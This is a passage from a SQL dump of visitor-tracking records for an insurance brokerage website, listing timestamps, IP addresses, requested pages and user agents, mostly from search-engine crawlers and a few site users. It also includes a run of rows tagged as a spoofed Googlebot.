Chrome','','','','','','','','0','0',0),(13989,'0b_2f7b6332b7f4c5b7cb61b7e622599a42','1459972468','66.249.75.89','crawl-66-249-75-89.googlebot.com','/case-status/','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'','','','','','Googlebot','','','','0','0',0),(13992,'0b_cdec73fe4d82244573972ce70506629a','1459972985','66.102.6.177,209.64.152.62','209.64.152.62','/','Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko; Google Web Preview) Chrome/27.0.1453 Safari/537.36','http://www.google.com/search','',0,'Linux','Google Chrome','us','','','','','','','0','0',0),(13995,'0b_24b89d93428b65b88f3b1a4c95472b13','1459973774','108.58.88.178','ool-6c3a58b2.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','','',0,'Win7 x64','IE 11','us','1536 x 864','','','','roisy','','0','51',0),(13997,'0b_24b89d93428b65b88f3b1a4c95472b13','1459973775','108.58.88.178','ool-6c3a58b2.static.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/','',0,'Win7 x64','IE 11','us','1536 x 864','','','','roisy','','0','0',0),(13998,'0b_78d3407b3194b529f09cd516b868a8f4','1459975100','183.60.244.37','183.60.244.37','/','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36','','',0,'MacOSX','Chrome 36','','','','','','','','0','0',0),(14001,'0b_8dc991c236bc7e5b8155501a6b8794fd','1459975786','151.138.13.244','151.138.13.244','/','SuperPagesUrlVerifyBot/1.0','','',0,'','','','','','SuperPagesUrlVerifyBot','','','','0','0',0),(14003,'0b_7c15e7c2e7b3805e66cc6af0da6cba7d','1459976148','173.229.96.235','ool-ade560eb.dyn.optonline.net','/','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36','','',0,'MacOSX','Chrome 49','us','','','','','','','0','0',0),(14006,'0b_7c15e7c2e7b3805e66cc6af0da6cba7d','1459976150','173.229.96.235','ool-ade560eb.dyn.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36','http://www.empireins.com/','',0,'MacOSX','Chrome 49','us','','','','','','','0','0',0),(14007,'0b_2d0f87dcab188939220297bb5ba9f396','1459976158','108.58.88.178','ool-6c3a58b2.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','','',0,'Win7 x64','IE 11','us','','','','','','','0','0',0),(14010,'0b_2d0f87dcab188939220297bb5ba9f396','1459976160','108.58.88.178','ool-6c3a58b2.static.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/','',0,'Win7 x64','IE 11','us','','','','','','','0','0',0),(14013,'0b_a0bbc8e027f03a1700d163d1ebf1801c','1459977505','66.249.75.109','crawl-66-249-75-109.googlebot.com','/','Mozilla/5.0 (iPhone; CPU iPhone OS 8_3 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12F70 Safari/600.1.4 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'iPhone OS','','','','','Googlebot-Mobile','','','','0','0',0),(14016,'0b_28c9b30e1f65eb1e351bbf8a10b1adad','1459977506','66.249.75.89','crawl-66-249-75-89.googlebot.com','/','Mozilla/5.0 (iPhone; CPU iPhone OS 8_3 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12F70 Safari/600.1.4 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'iPhone OS','','','','','Googlebot-Mobile','','','','0','0',0),(14018,'0b_827b8ae85acba4057e880b4db0b843f7','1459977670','50.108.156.48','50.108.156.48','/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36','','',0,'Win7','Chrome 49','us','1920 x 1080','','','','ykaufman','','0','0',0),(14021,'0b_827b8ae85acba4057e880b4db0b843f7','1459977672','50.108.156.48','50.108.156.48','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 49','us','1920 x 1080','','','','ykaufman','','0','0',0),(14022,'0b_827b8ae85acba4057e880b4db0b843f7','1459977676','50.108.156.48','50.108.156.48','/agent-tools/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 49','us','1920 x 1080','','','','ykaufman','','0','51',0),(14025,'0b_827b8ae85acba4057e880b4db0b843f7','1459977682','50.108.156.48','50.108.156.48','/case-status/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36','http://www.empireins.com/agent-tools/','',0,'Win7','Chrome 49','us','1920 x 1080','','','','ykaufman','','0','51',0),(14027,'0b_fedff5ed83302cb4f180c863429db4b8','1459977813','107.172.235.220','107-172-235-220-host.colocrossing.com','/contact/','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36','http://www.empireins.com/','',0,'MacOSX','Chrome 39','us','','','','','','','0','0',0),(14028,'0b_b618460f82654ada5a45561c2e44c7e4','1459978338','54.219.158.24','ec2-54-219-158-24.us-west-1.compute.amazonaws.com','/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.52 Safari/537.36 OPR/15.0.1147.100','http://www.whoishostingthis.com','',0,'Win7','Google Chrome','us','','','','','','','0','0',0),(14030,'0b_b618460f82654ada5a45561c2e44c7e4','1459978359','54.219.158.24','ec2-54-219-158-24.us-west-1.compute.amazonaws.com','/insentives/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.52 Safari/537.36 OPR/15.0.1147.100','http://www.whoishostingthis.com','',0,'Win7','Google Chrome','us','','','','','','','0','0',0),(14033,'0b_b618460f82654ada5a45561c2e44c7e4','1459978361','54.219.158.24','ec2-54-219-158-24.us-west-1.compute.amazonaws.com','/carriers/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.52 Safari/537.36 OPR/15.0.1147.100','http://www.whoishostingthis.com','',0,'Win7','Google Chrome','us','','','','','','','0','0',0),(14034,'0b_b618460f82654ada5a45561c2e44c7e4','1459978364','54.219.158.24','ec2-54-219-158-24.us-west-1.compute.amazonaws.com','/igo/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.52 Safari/537.36 OPR/15.0.1147.100','http://www.whoishostingthis.com','',0,'Win7','Google Chrome','us','','','','','','','0','0',0),(14036,'0b_b618460f82654ada5a45561c2e44c7e4','1459978363','54.219.158.24','ec2-54-219-158-24.us-west-1.compute.amazonaws.com','/igo/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.52 Safari/537.36 OPR/15.0.1147.100','http://www.whoishostingthis.com','',0,'Win7','Google Chrome','us','','','','','','','0','0',0),(14039,'0b_b618460f82654ada5a45561c2e44c7e4','1459978371','54.219.158.24','ec2-54-219-158-24.us-west-1.compute.amazonaws.com','/case-status/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.52 Safari/537.36 OPR/15.0.1147.100','http://www.whoishostingthis.com','',0,'Win7','Google Chrome','us','','','','','','','0','0',0),(14042,'0b_b618460f82654ada5a45561c2e44c7e4','1459978374','54.219.158.24','ec2-54-219-158-24.us-west-1.compute.amazonaws.com','/about-us/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.52 Safari/537.36 OPR/15.0.1147.100','http://www.whoishostingthis.com','',0,'Win7','Google Chrome','us','','','','','','','0','0',0),(14043,'0b_b618460f82654ada5a45561c2e44c7e4','1459978374','54.219.158.24','ec2-54-219-158-24.us-west-1.compute.amazonaws.com','/about-us/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.52 Safari/537.36 OPR/15.0.1147.100','http://www.whoishostingthis.com','',0,'Win7','Google Chrome','us','','','','','','','0','0',0),(14045,'0b_b618460f82654ada5a45561c2e44c7e4','1459978377','54.219.158.24','ec2-54-219-158-24.us-west-1.compute.amazonaws.com','/licensing-contracting/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.52 Safari/537.36 OPR/15.0.1147.100','http://www.whoishostingthis.com','',0,'Win7','Google Chrome','us','','','','','','','0','0',0),(14046,'0b_b618460f82654ada5a45561c2e44c7e4','1459978377','54.219.158.24','ec2-54-219-158-24.us-west-1.compute.amazonaws.com','/licensing-contracting/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.52 Safari/537.36 OPR/15.0.1147.100','http://www.whoishostingthis.com','',0,'Win7','Google Chrome','us','','','','','','','0','0',0),(14049,'0b_b618460f82654ada5a45561c2e44c7e4','1459978432','54.219.158.24','ec2-54-219-158-24.us-west-1.compute.amazonaws.com','/case-success-voya-turns-aviation-case-into-the-friendly-skies-for-218k-of-target/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.52 Safari/537.36 OPR/15.0.1147.100','http://www.whoishostingthis.com','',0,'Win7','Google Chrome','us','','','','','','','0','0',0),(14052,'0b_b618460f82654ada5a45561c2e44c7e4','1459978445','54.219.158.24','ec2-54-219-158-24.us-west-1.compute.amazonaws.com','/term-quotes/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.52 Safari/537.36 OPR/15.0.1147.100','http://www.whoishostingthis.com','',0,'Win7','Google Chrome','us','','','','','','','0','0',0),(14054,'0b_b618460f82654ada5a45561c2e44c7e4','1459978448','54.219.158.24','ec2-54-219-158-24.us-west-1.compute.amazonaws.com','/agent-tools/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.52 Safari/537.36 OPR/15.0.1147.100','http://www.whoishostingthis.com','',0,'Win7','Google Chrome','us','','','','','','','0','0',0),(14057,'0b_b618460f82654ada5a45561c2e44c7e4','1459978451','54.219.158.24','ec2-54-219-158-24.us-west-1.compute.amazonaws.com','/case-success-companion-life-chronic-illness-rider-saves-ltc-decline/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.52 Safari/537.36 OPR/15.0.1147.100','http://www.whoishostingthis.com','',0,'Win7','Google Chrome','us','','','','','','','0','0',0),(14058,'0b_677696e7885e320aee5e94a0d87ed0f9','1459980474','192.3.128.138','host.colocrossing.com','/','Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)','','',0,'WinXP','IE 7','us','','','','','','','0','0',0),(14060,'0b_530d5e211a53370e830db505bdb3ef93','1459981858','213.254.241.7','213.254.241.7','/','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)','','',0,'Win7 x64','IE 9','us','','','','','','','0','0',0),(14063,'0b_4f4fb86576fcde4965b24923bea48392','1459985405','207.46.13.19','msnbot-207-46-13-19.search.msn.com','/robots.txt','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(14064,'0b_4f4fb86576fcde4965b24923bea48392','1459985441','207.46.13.19','msnbot-207-46-13-19.search.msn.com','/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(14067,'0b_aa5581d89c4f9f19bc982ff200de9915','1459987159','69.30.201.98','69.30.201.98','/robots.txt','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','','','','MJ12bot','','','','0','0',0),(14069,'0b_aa5581d89c4f9f19bc982ff200de9915','1459987170','69.30.201.98','69.30.201.98','/?p=277','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','en','','','MJ12bot','','','','0','0',0),(14072,'0b_aa5581d89c4f9f19bc982ff200de9915','1459987181','69.30.201.98','69.30.201.98','/prodmod-john-hancock-is-discontinuing-sale-of-ny-partnership-custom-care-iii-ltc-product/','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','en','','','MJ12bot','','','','0','0',0),(14075,'0b_5ce180674a14c36de40fee211cb7d18d','1459987580','66.249.75.89','crawl-66-249-75-89.googlebot.com','/','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'','','','','','Googlebot','','','','0','0',0),(14078,'0b_ed39e47f935754076f1bae7e045ed9a4','1459987694','91.121.221.15','mansfield2.didici.be','/robots.txt','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','be','','','MJ12bot','','','','0','0',0),(14081,'0b_ed39e47f935754076f1bae7e045ed9a4','1459987696','91.121.221.15','mansfield2.didici.be','/companylinks.htm','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','be','','','MJ12bot','','','','0','0',0),(14082,'0b_1dc030233e9d96a8a7779680cacec4ab','1459990547','157.55.39.113','msnbot-157-55-39-113.search.msn.com','/agent-tools/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(14084,'0b_c1e3bfbc53ac62611064a20f49cb0531','1459993174','173.208.136.114','173.208.136.114','/','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36','','',0,'Win7','Chrome 41','','','','','','','','0','0',0),(14085,'0b_7c566c558778830652b1780f500bb49f','1459994233','207.46.13.19','msnbot-207-46-13-19.search.msn.com','/robots.txt','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(14087,'0b_b8449f8170b7273800adc7b4e45d36b5','1459996922','72.9.226.190','72.9.226.190','/','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'','','','','','Spoofer bot','','','','3','0',0),(14090,'0b_b8449f8170b7273800adc7b4e45d36b5','1459996944','72.9.226.190','72.9.226.190','/agent-tools/','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'','','','','','Spoofer bot','','','','3','0',0),(14091,'0b_b8449f8170b7273800adc7b4e45d36b5','1459996953','72.9.226.190','72.9.226.190','/about-us/','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'','','','','','Spoofer bot','','','','3','0',0),(14093,'0b_b8449f8170b7273800adc7b4e45d36b5','1459996963','72.9.226.190','72.9.226.190','/contact/','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'','','','','','Spoofer bot','','','','3','0',0),(14096,'0b_b8449f8170b7273800adc7b4e45d36b5','1459996974','72.9.226.190','72.9.226.190','/prodmod-john-hancock-is-discontinuing-sale-of-ny-partnership-custom-care-iii-ltc-product/','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'','','','','','Spoofer bot','','','','3','0',0),(14099,'0b_b8449f8170b7273800adc7b4e45d36b5','1459996984','72.9.226.190','72.9.226.190','/aig-releases-new-term-rates-and-re-enters-ny/','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'','','','','','Spoofer bot','','','','3','0',0),(14102,'0b_b8449f8170b7273800adc7b4e45d36b5','1459996994','72.9.226.190','72.9.226.190','/case-success-companion-life-chronic-illness-rider-saves-ltc-decline/','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'','','','','','Spoofer bot','','','','3','0',0),(14103,'0b_b8449f8170b7273800adc7b4e45d36b5','1459997004','72.9.226.190','72.9.226.190','/about-us/meet-the-eib-team/','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'','','','','','Spoofer bot','','','','3','0',0),(14105,'0b_b8449f8170b7273800adc7b4e45d36b5','1459997017','72.9.226.190','72.9.226.190','/about-us/feed/','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'','','','','','Spoofer bot','','','','3','0',0),(14106,'0b_b8449f8170b7273800adc7b4e45d36b5','1459997027','72.9.226.190','72.9.226.190','/case-success-companion-life-chronic-illness-rider-saves-ltc-decline/feed/','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'','','','','','Spoofer bot','','','','3','0',0),(14108,'0b_b8449f8170b7273800adc7b4e45d36b5','1459997040','72.9.226.190','72.9.226.190','/contact/feed/','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'','','','','','Spoofer bot','','','','3','0',0),(14111,'0b_b8449f8170b7273800adc7b4e45d36b5','1459997053','72.9.226.190','72.9.226.190','/prodmod-john-hancock-is-discontinuing-sale-of-ny-partnership-custom-care-iii-ltc-product/feed/','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'','','','','','Spoofer bot','','','','3','0',0),(14114,'0b_b8449f8170b7273800adc7b4e45d36b5','1459997062','72.9.226.190','72.9.226.190','/aig-releases-new-term-rates-and-re-enters-ny/feed/','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'','','','','','Spoofer bot','','','','3','0',0),(14115,'0b_b8449f8170b7273800adc7b4e45d36b5','1459997072','72.9.226.190','72.9.226.190','/agent-tools/','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'','','','','','Spoofer bot','','','','3','0',0),(14118,'0b_b8449f8170b7273800adc7b4e45d36b5','1459997085','72.9.226.190','72.9.226.190','/feed/','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'','','','','','Spoofer bot','','','','3','0',0),(14121,'0b_b8449f8170b7273800adc7b4e45d36b5','1459997095','72.9.226.190','72.9.226.190','/comments/feed/','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'','','','','','Spoofer bot','','','','3','0',0),(14124,'0b_b8449f8170b7273800adc7b4e45d36b5','1459997104','72.9.226.190','72.9.226.190','/home/feed/','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'','','','','','Spoofer bot','','','','3','0',0),(14127,'0b_b8449f8170b7273800adc7b4e45d36b5','1459997114','72.9.226.190','72.9.226.190','/insentives/','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'','','','','','Spoofer bot','','','','3','0',0),(14129,'0b_b8449f8170b7273800adc7b4e45d36b5','1459997127','72.9.226.190','72.9.226.190','/licensing-contracting/','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'','','','','','Spoofer bot','','','','3','0',0),(14130,'0b_b8449f8170b7273800adc7b4e45d36b5','1459997136','72.9.226.190','72.9.226.190','/carriers/','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'','','','','','Spoofer bot','','','','3','0',0),(14133,'0b_b8449f8170b7273800adc7b4e45d36b5','1459997148','72.9.226.190','72.9.226.190','/case-status/','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'','','','','','Spoofer bot','','','','3','0',0),(14136,'0b_b8449f8170b7273800adc7b4e45d36b5','1459997160','72.9.226.190','72.9.226.190','/forms/','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'','','','','','Spoofer bot','','','','3','0',0),(14138,'0b_b8449f8170b7273800adc7b4e45d36b5','1459997170','72.9.226.190','72.9.226.190','/igo/','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'','','','','','Spoofer bot','','','','3','0',0),(14141,'0b_b8449f8170b7273800adc7b4e45d36b5','1459997181','72.9.226.190','72.9.226.190','/term-quotes/','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'','','','','','Spoofer bot','','','','3','0',0),(14144,'0b_b8449f8170b7273800adc7b4e45d36b5','1459997192','72.9.226.190','72.9.226.190','/case-success-voya-turns-aviation-case-into-the-friendly-skies-for-218k-of-target/','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'','','','','','Spoofer bot','','','','3','0',0),(14145,'0b_b8449f8170b7273800adc7b4e45d36b5','1459997204','72.9.226.190','72.9.226.190','/?p=9','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'','','','','','Spoofer bot','','','','3','0',0),(14147,'0b_b8449f8170b7273800adc7b4e45d36b5','1459997214','72.9.226.190','72.9.226.190','/about-us/','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'','','','','','Spoofer bot','','','','3','0',0),(14148,'0b_b8449f8170b7273800adc7b4e45d36b5','1459997214','72.9.226.190','72.9.226.190','/?p=8','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'','','','','','Spoofer bot','','','','3','0',0),(14150,'0b_b8449f8170b7273800adc7b4e45d36b5','1459997224','72.9.226.190','72.9.226.190','/contact/','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'','','','','','Spoofer bot','','','','3','0',0),(14153,'0b_b8449f8170b7273800adc7b4e45d36b5','1459997224','72.9.226.190','72.9.226.190','/?p=277','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'','','','','','Spoofer bot','','','','3','0',0),(14154,'0b_b8449f8170b7273800adc7b4e45d36b5','1459997234','72.9.226.190','72.9.226.190','/prodmod-john-hancock-is-discontinuing-sale-of-ny-partnership-custom-care-iii-ltc-product/','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'','','','','','Spoofer bot','','','','3','0',0),(14156,'0b_b8449f8170b7273800adc7b4e45d36b5','1459997235','72.9.226.190','72.9.226.190','/?page_id=171?a=pwdreset','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'','','','','','Spoofer bot','','','','3','0',0),(14159,'0b_b8449f8170b7273800adc7b4e45d36b5','1459997247','72.9.226.190','72.9.226.190','/?page_id=169','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'','','','','','Spoofer bot','','','','3','0',0),(14162,'0b_b8449f8170b7273800adc7b4e45d36b5','1459997257','72.9.226.190','72.9.226.190','/register/','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'','','','','','Spoofer bot','','','','3','0',0),(14165,'0b_b8449f8170b7273800adc7b4e45d36b5','1459997257','72.9.226.190','72.9.226.190','/?p=283','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'','','','','','Spoofer bot','','','','3','0',0),(14168,'0b_b8449f8170b7273800adc7b4e45d36b5','1459997267','72.9.226.190','72.9.226.190','/aig-releases-new-term-rates-and-re-enters-ny/','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'','','','','','Spoofer bot','','','','3','0',0),(14169,'0b_b8449f8170b7273800adc7b4e45d36b5','1459997268','72.9.226.190','72.9.226.190','/?p=290','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'','','','','','Spoofer bot','','','','3','0',0),(14172,'0b_10832bbd2076852b227528e746f029f1','1459997311','180.76.15.28','baiduspider-180-76-15-28.crawl.baidu.com','/igo/','Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)','','',0,'','','us','','','Baiduspider','','','','0','0',0),(14175,'0b_7cad3aa78fecfa6d18bc0c56aa231226','1459997343','66.249.83.137,47.17.234.126','ool-2f11ea7e.dyn.optonline.net','/','Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.75 Safari/537.36 Google Favicon','','',0,'Linux','Google Chrome','','','','','','','','0','0',0),(14177,'0b_7e4e3d910c15661415d1fd4ff4fb6232','1459997344','66.249.83.144,47.17.234.126','ool-2f11ea7e.dyn.optonline.net','/','Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.75 Safari/537.36 Google Favicon','','',0,'Linux','Google Chrome','','','','','','','','0','0',0),(14180,'0b_818e732cf79737a4cb6262e710fbd620','1459999425','100.43.81.146','spider-100-43-81-146.yandex.com','/robots.txt','Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)','','',0,'','','','','','Yandex','','','','0','0',0),(14183,'0b_fac6ffd93c8de4f7568bb452f014c7d4','1460005031','141.8.143.235','spider-141-8-143-235.yandex.com','/','Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)','','',0,'','','ru','','','Yandex','','','','0','0',0),(14184,'0b_fac6ffd93c8de4f7568bb452f014c7d4','1460005031','141.8.143.235','spider-141-8-143-235.yandex.com','/','Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)','','',0,'','','ru','','','Yandex','','','','0','0',0),(14187,'0b_a1422989aac6e297583d054026385059','1460005298','13.90.208.223','13.90.208.223','/','semanticbot','','',0,'','','','','','','','','','3','0',0),(14189,'0b_a1422989aac6e297583d054026385059','1460005317','13.90.208.223','13.90.208.223','/robots.txt','semanticbot','','',0,'','','','','','','','','','3','0',0),(14192,'0b_a1422989aac6e297583d054026385059','1460005327','13.90.208.223','13.90.208.223','/','semanticbot','','',0,'','','','','','','','','','3','0',0),(14193,'0b_a1422989aac6e297583d054026385059','1460005338','13.90.208.223','13.90.208.223','/contact','semanticbot','','',0,'','','','','','','','','','3','0',0),(14196,'0b_a1422989aac6e297583d054026385059','1460005348','13.90.208.223','13.90.208.223','/contact/','semanticbot','','',0,'','','','','','','','','','3','0',0),(14198,'0b_a1422989aac6e297583d054026385059','1460005358','13.90.208.223','13.90.208.223','/about-us','semanticbot','','',0,'','','','','','','','','','3','0',0),(14201,'0b_a1422989aac6e297583d054026385059','1460005368','13.90.208.223','13.90.208.223','/about-us/','semanticbot','','',0,'','','','','','','','','','3','0',0),(14204,'0b_a1422989aac6e297583d054026385059','1460005378','13.90.208.223','13.90.208.223','/insentives','semanticbot','','',0,'','','','','','','','','','3','0',0),(14205,'0b_a1422989aac6e297583d054026385059','1460005388','13.90.208.223','13.90.208.223','/insentives/','semanticbot','','',0,'','','','','','','','','','3','0',0),(14208,'0b_a1422989aac6e297583d054026385059','1460005398','13.90.208.223','13.90.208.223','/licensing-contracting','semanticbot','','',0,'','','','','','','','','','3','0',0),(14210,'0b_a1422989aac6e297583d054026385059','1460005408','13.90.208.223','13.90.208.223','/licensing-contracting/','semanticbot','','',0,'','','','','','','','','','3','0',0),(14211,'0b_a1422989aac6e297583d054026385059','1460005418','13.90.208.223','13.90.208.223','/agent-tools','semanticbot','','',0,'','','','','','','','','','3','0',0),(14214,'0b_a1422989aac6e297583d054026385059','1460005427','13.90.208.223','13.90.208.223','/agent-tools/','semanticbot','','',0,'','','','','','','','','','3','0',0),(14216,'0b_a1422989aac6e297583d054026385059','1460005437','13.90.208.223','13.90.208.223','/carriers','semanticbot','','',0,'','','','','','','','','','3','0',0),(14217,'0b_a1422989aac6e297583d054026385059','1460005447','13.90.208.223','13.90.208.223','/carriers/','semanticbot','','',0,'','','','','','','','','','3','0',0),(14220,'0b_a1422989aac6e297583d054026385059','1460005457','13.90.208.223','13.90.208.223','/register','semanticbot','','',0,'','','','','','','','','','3','0',0),(14223,'0b_a1422989aac6e297583d054026385059','1460005467','13.90.208.223','13.90.208.223','/register/','semanticbot','','',0,'','','','','','','','','','3','0',0),(14226,'0b_a1422989aac6e297583d054026385059','1460005476','13.90.208.223','13.90.208.223','/about-us/meet-the-eib-team','semanticbot','','',0,'','','','','','','','','','3','0',0),(14228,'0b_a1422989aac6e297583d054026385059','1460005486','13.90.208.223','13.90.208.223','/meet-the-eib-team/','semanticbot','','',0,'','','','','','','','','','3','0',0),(14229,'0b_a1422989